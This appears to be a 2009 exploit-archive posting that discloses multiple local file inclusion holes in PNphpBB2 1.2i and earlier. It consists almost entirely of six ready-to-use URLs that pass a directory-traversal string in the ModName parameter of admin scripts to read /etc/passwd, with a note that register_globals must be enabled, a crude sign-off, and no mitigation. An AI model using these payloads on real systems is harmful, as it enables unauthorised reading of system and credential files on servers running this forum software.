PNphpBB2 <= 1.2i (ModName) Multiple LFI Vulnerabilities
2009-01-04 05:33:26+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| PNphpBB2 <= 1.2i (ModName) Multiple LFI Vulnerabilities | Note |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| discovered by athos - staker[at]hotmail[dot]it | register glob 1 |
| download on http://www.pnphpbb.com/ | enjoy your aids |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+--=--=--=--=--=-=+
| Local File Inclusion |
| 1. admin/admin_words.php?ModName=../../../../../etc/passwd |
| 2. admin/admin_groups_reapir.php?ModName=../../../../../etc/passwd |
| 3. admin/admin_smilies.php?ModName=../../../../../etc/passwd |
| 4. admin/admin_ranks.php?ModName=../../../../../etc/passwd |
| 5. admin/admin_styles.php?ModName=../../../../../etc/passwd |
| 6. admin/admin_users.php?ModName=../../../../../etc/passwd |
+=--=--=--=--=--+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+-=--=--=--=--=--=-+
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

